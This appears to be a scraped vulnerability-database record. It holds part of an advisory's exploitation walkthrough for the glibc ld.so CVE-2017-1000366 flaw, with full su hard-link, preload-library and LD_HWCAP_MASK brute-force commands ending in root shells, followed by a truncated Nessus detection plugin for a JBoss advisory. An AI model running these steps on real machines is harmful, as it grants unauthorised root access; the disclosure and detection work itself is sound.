path=/lib/i386-linux-gnu/tls/i686:/lib/i386-linux-gnu/tls:/lib/i386-linux-gnu/i686:/lib/i386-linux-gnu:/usr/lib/i386-linux-gnu/tls/i686:/usr/lib/i386-linux-gnu/tls:/usr/lib/i386-linux-gnu/i686:/usr/lib/i386-linux-gnu:/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)\r\n 1607: trying file=/lib/i386-linux-gnu/tls/i686/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/tls/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/i686/nonexistent\r\n 1607: trying file=/lib/i386-linux-gnu/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/tls/i686/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/tls/nonexistent\r\n 1607: trying file=/usr/lib/i386-linux-gnu/i686/nonexistent\r\n \r\nThe \"system search path\" line shows four system directories:\r\n\"/lib/i386-linux-gnu\", \"/usr/lib/i386-linux-gnu\", \"/lib\", and \"/usr/lib\"\r\n(\"tls\" and \"i686\" are default hardware capabilities that are enabled\r\neven if LD_HWCAP_MASK is 0).\r\n \r\n2/ Second, we create our $ORIGIN directory and hard-link the SUID-root\r\nbinary \"su\" into it:\r\n \r\n$ mkdir -p '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ cd '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ ln `which su` .\r\n \r\nThe pathname of our $ORIGIN directory contains two system directories:\r\nwe will write 12 bytes (3 pointers: one for each system directory, plus\r\na terminating NULL pointer) to an 8-byte \"env_path_list.dirs\" (\"nllp\" is\r\nonly 1, because our unexpanded LD_LIBRARY_PATH does not contain colons).\r\nIn other words, we will overflow \"env_path_list.dirs\" and write 4 bytes\r\n(the terminating NULL pointer) out of bounds.\r\n \r\n3/ Third, we overwrite this out-of-bounds NULL pointer with the first\r\nbytes of an error message (\"cannot open shared object file\") that is\r\nmalloc()ated after \"env_path_list.dirs\" because of our \"nonexistent\"\r\npreload library. Consequently, ld.so crashes when open_path() tries to\r\nopen our second preload library \"rootshell.so\" in a directory described\r\nby an \"r_search_path_elem\" structure located at the unmapped address\r\n0x6e6e6163 (the overwritten NULL pointer):\r\n \r\n$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\n$ dmesg | tail -n 1\r\n[70632.888695] su[2293]: segfault at 6e6e6173 ip b77e1c43 sp bfc946dc error 4 in ld-2.24.so[b77db000+22000]\r\n \r\nThe \"/../../../../../../../../$LIB\" suffix is required, to pass the\r\n\"check_for_trusted\" test in _dl_dst_substitute() (our expanded\r\nLD_LIBRARY_PATH must be rooted in one of the system's trusted\r\ndirectories).\r\n \r\n4/ Next, we copy the library dependencies of \"su\" to our current working\r\ndirectory, and compile our preload library \"rootshell.so\" (\"la.c\" can be\r\nfound at the beginning of our stack-clash exploit \"Linux_ldso_hwcap.c\"):\r\n \r\n$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .\r\n \r\n$ cat > la.c << \"EOF\"\r\n> static void __attribute__ ((constructor)) _init (void) {\r\n> ...\r\n> // setuid(0);\r\n> ...\r\n> // execve(\"/bin/sh\");\r\n> ...\r\n> }\r\n> EOF\r\n$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c\r\n \r\n$ chmod u+s rootshell.so\r\n \r\nThis \"chmod\" is required, to pass the SUID-bit test in open_path().\r\n \r\n5/ Last, we run \"su\" with an increasing number of hardware capabilities\r\n(i.e., with an increasingly large \"rtld_search_dirs.dirs[0]\"), until the\r\n\"rtld_search_dirs.dirs[0]\" occupies the address 0x6e6e6163. Because this\r\n\"rtld_search_dirs.dirs[0]\" is mostly filled with null bytes, and because\r\nan \"r_search_path_elem\" structure filled with null bytes is equivalent\r\nto the current working directory in open_path(), ld.so will eventually\r\nload and execute our \"rootshell.so\" from the current working directory:\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<16)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m0.715s\r\nuser 0m0.120s\r\nsys 0m0.588s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<17)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m1.443s\r\nuser 0m0.368s\r\nsys 0m1.072s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<18)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m2.840s\r\nuser 0m0.656s\r\nsys 0m2.172s\r\n \r\n...\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<23)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m5.778s\r\nuser 0m1.200s\r\nsys 0m4.576s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<24)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\nSegmentation fault\r\n \r\nreal 0m11.589s\r\nuser 0m2.520s\r\nsys 0m9.060s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m28.050s\r\nuser 0m6.140s\r\nsys 0m21.892s\r\n \r\n6/ Improvements in the running time of this exploit are left as an\r\nexercise for the interested reader:\r\n \r\n$ env -i LD_LIBRARY_PATH=. LD_PRELOAD=nonexistent LD_HWCAP_MASK=\"$(((1<<25)-1))\" LD_DEBUG=libs env 2>&1 | head -c 1000\r\n 3084: find library=nonexistent [0]; searching\r\n 3084: search path=./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/vme:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/de/vme/fpu:./tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mc\r\n \r\n$ mkdir -p './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'\r\n \r\n$ mv -- *.so* './tls/i686/fxsr/mmx/clflush/pse36/pat/cmov/mca/pge/mtrr/sep/apic/cx8/mce/pae/msr/tsc/pse/de/vme/fpu'\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded (cannot open shared object file): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m23.485s\r\nuser 0m5.244s\r\nsys 0m18.220s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='os-release:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'os-release' from LD_PRELOAD cannot be preloaded (invalid ELF header): ignored.\r\n# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),1000(user)\r\n \r\nreal 0m11.352s\r\nuser 0m2.844s\r\nsys 0m8.388s\r\n \r\n------------------------------------------------------------------------\r\nCentOS 7 (i386)\r\n------------------------------------------------------------------------\r\n \r\nIn this example, we exploit \"su\" on a 32-bit CentOS 7.3.1611: we\r\ninstalled \"CentOS-7-i386-Minimal-1611.iso\" (the last release before\r\nCVE-2017-1000366 was patched), and manually disabled protected_hardlinks\r\n(\"echo 0 > /proc/sys/fs/protected_hardlinks\").\r\n \r\n$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head\r\n 17896: find library=nonexistent [0]; searching\r\n 17896: search cache=/etc/ld.so.cache\r\n 17896: search path=/lib/tls/i686:/lib/tls:/lib/i686:/lib:/usr/lib/tls/i686:/usr/lib/tls:/usr/lib/i686:/usr/lib (system search path)\r\n 17896: trying file=/lib/tls/i686/nonexistent\r\n 17896: trying file=/lib/tls/nonexistent\r\n 17896: trying file=/lib/i686/nonexistent\r\n 17896: trying file=/lib/nonexistent\r\n 17896: trying file=/usr/lib/tls/i686/nonexistent\r\n 17896: trying file=/usr/lib/tls/nonexistent\r\n 17896: trying file=/usr/lib/i686/nonexistent\r\n \r\n$ mkdir -p '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ cd '/var/tmp/:/lib:/usr/lib:'\r\n \r\n$ ln `which su` .\r\n \r\n$ env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\n$ dmesg | tail -n 1\r\n[ 8414.911000] su[18088]: segfault at 6e6e6173 ip b77645e2 sp bfe0cb40 error 4 in ld-2.17.so[b775f000+1f000]\r\n \r\n$ cp -- `ldd ./su | grep ' => /' | awk '{print $3}'` .\r\n \r\n$ cat > la.c << \"EOF\"\r\n> static void __attribute__ ((constructor)) _init (void) {\r\n> ...\r\n> // setuid(0);\r\n> ...\r\n> // execve(\"/bin/sh\");\r\n> ...\r\n> }\r\n> EOF\r\n$ gcc -fpic -shared -nostdlib -Os -s -o rootshell.so la.c\r\n \r\n$ chmod u+s rootshell.so\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<16)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m0.527s\r\nuser 0m0.085s\r\nsys 0m0.441s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<17)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m1.060s\r\nuser 0m0.182s\r\nsys 0m0.877s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<18)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m2.093s\r\nuser 0m0.384s\r\nsys 0m1.702s\r\n \r\n...\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<25)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m17.071s\r\nuser 0m2.525s\r\nsys 0m14.537s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<26)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nSegmentation fault\r\n \r\nreal 0m33.926s\r\nuser 0m5.464s\r\nsys 0m28.429s\r\n \r\n$ time env -i LD_LIBRARY_PATH='$ORIGIN/../../../../../../../../$LIB' LD_PRELOAD='nonexistent:rootshell.so' LD_HWCAP_MASK=\"$(((1<<27)-1))\" ./su\r\nERROR: ld.so: object 'nonexistent' from LD_PRELOAD cannot be preloaded: ignored.\r\nsh-4.2# id; exit\r\nuid=0(root) gid=0(root) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n \r\nreal 1m30.604s\r\nuser 0m16.169s\r\nsys 1m14.395s\r\n \r\n \r\n========================================================================\r\nAcknowledgments\r\n========================================================================\r\n \r\nWe thank the members of the [email\u00a0protected] list.\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/29207"}], "nessus": [{"lastseen": "2019-11-01T03:21:19", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.13\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.12, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that the jboss init script performed unsafe file\nhandling which could result in local privilege escalation.\n(CVE-2016-8656)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack and/or obtain sensitive information from\nrequests other then their own. (CVE-2016-6816)\n\n* An EAP feature to download server log files allows logs to be\navailable via GET requests making them vulnerable to cross-origin\nattacks. An attacker could trigger the user", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2017-0245.NASL", "href": "https://www.tenable.com/plugins/nessus/112252", "published": "2018-09-04T00:00:00", "title": "RHEL 7 : JBoss EAP (RHSA-2017:0245)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0245. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112252);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-6816\", \"CVE-2016-7061\", \"CVE-2016-8627\", \"CVE-2016-8656\");\n script_xref(name:\"RHSA\", value:\"2017:0245\");\n\n script_name(english:\"RHEL 7 : JBoss EAP (RHSA-2017:0245)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.13\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.12, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that the jboss init script performed unsafe file\nhandling which could result in local privilege escalation.\n(CVE-2016-8656)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack and/or obtain sensitive information from\nrequests other then their own. (CVE-2016-6816)\n\n* An EAP feature to download server log files allows logs to be\navailable via GET requests making them vulnerable to cross-origin\nattacks. An attacker could trigger the user's browser to request the\nlog files consuming enough resources that normal server functioning\ncould be impaired. (CVE-2016-8627)\n\n* It was discovered that when configuring RBAC and marking information\nas sensitive, users with a Monitor role are able to view the sensitive\ninformation. (CVE-2016-7061)\n\nThe CVE-2016-8627 issue was discovered by Darran Lofthouse (Red Hat)\nand Brian Stansberry (Red Hat).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0245\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8627\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8656\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:infinispan\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:infinispan-cachestore-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:infinispan-cachestore-remote\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:infinispan-client-hotrod\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:infinispan-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif 